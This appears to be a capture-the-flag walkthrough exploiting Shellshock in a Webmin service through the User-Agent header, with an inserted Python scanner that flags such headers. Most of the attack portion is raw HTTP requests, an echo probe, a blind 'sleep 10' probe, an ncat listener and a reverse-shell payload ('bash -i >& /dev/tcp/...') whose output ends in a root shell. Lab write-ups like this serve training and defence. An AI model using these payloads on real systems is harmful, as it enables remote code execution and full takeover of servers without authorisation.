Steps
Grab the request in Burp and send it to Repeater; you should see something like:
GET / HTTP/1.1
Host: 10.10.10.7:10000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: elastixSession=kes9e8oisk620cbbths8sgalo1; testing=1
Connection: close
Upgrade-Insecure-Requests: 1
If you modify the User-Agent line to
User-Agent: () { :; }; /bin/echo hello
you should see hello in the response.
Oops, I was writing in English again, I swear it's not on purpose.
There is also a blind version:
GET / HTTP/1.1
Host: 10.10.10.7:10000
User-Agent: () { :; }; sleep 10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: elastixSession=kes9e8oisk620cbbths8sgalo1; testing=1
Connection: close
Upgrade-Insecure-Requests: 1
This makes the server wait an extra 10 seconds before responding.
If that happens, it means we can inject commands.
The first thing to do is start a listener (on any port; here I randomly picked 9090):
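As an added example (not from the original write-up), here is a small Python scanner that flags request headers carrying the function-definition prefix that both requests above rely on: a vulnerable bash imports any environment variable whose value begins with "() {" as a function and runs whatever follows the closing brace, and CGI front-ends such as Webmin copy headers into such variables. The sample requests inside it are constructed.

```python
"""Flag HTTP request headers that carry a Shellshock-style payload."""
import re

# The function-definition prefix bash looks for, with flexible spacing so
# that "(){" and "()  {" are caught as well as the canonical "() {".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def parse_headers(raw: str) -> dict:
    """Return {header-name-lowercase: value} for a raw HTTP request head."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.replace("\r\n", "\n").split("\n")[1:]:  # skip request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def find_shellshock_headers(raw: str) -> list:
    """Return [(header, command_after_brace), ...] for suspicious headers."""
    hits = []
    for name, value in parse_headers(raw).items():
        m = SHELLSHOCK_RE.search(value)
        if m:
            # Whatever follows the closing "}" is what bash would execute.
            tail = value[m.end():].split("}", 1)
            command = tail[1].strip(" ;\t") if len(tail) == 2 else ""
            hits.append((name, command))
    return hits


# Constructed sample requests: one benign, one echo probe, one blind probe.
BENIGN = "GET / HTTP/1.1\r\nHost: 10.10.10.7:10000\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
ECHO = ("GET / HTTP/1.1\r\nHost: 10.10.10.7:10000\r\n"
        "User-Agent: () { :; }; /bin/echo hello\r\n\r\n")
BLIND = ("GET / HTTP/1.1\r\nHost: 10.10.10.7:10000\r\n"
         "User-Agent: () { :; }; sleep 10\r\nReferer: http://example.invalid/\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("echo", ECHO), ("blind", BLIND)):
        print(label, find_shellshock_headers(req))
```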
root@kali:~# ncat -lvnp 9090
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 045C 136E D640 8127 B4D3 505D FCB7 11FF 3055 CC1B
Ncat: Listening on :::9090
Ncat: Listening on 0.0.0.0:9090
And we inject the command:
User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.9/9090 0>&1
When you send it, it should connect back:
root@kali:~# ncat -lvnp 9090
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 045C 136E D640 8127 B4D3 505D FCB7 11FF 3055 CC1B
Ncat: Listening on :::9090
Ncat: Listening on 0.0.0.0:9090
Ncat: Connection from 10.10.10.7.
Ncat: Connection from 10.10.10.7:57636.
bash: no job control in this shell
[root@beep webmin]# ls
and we have root.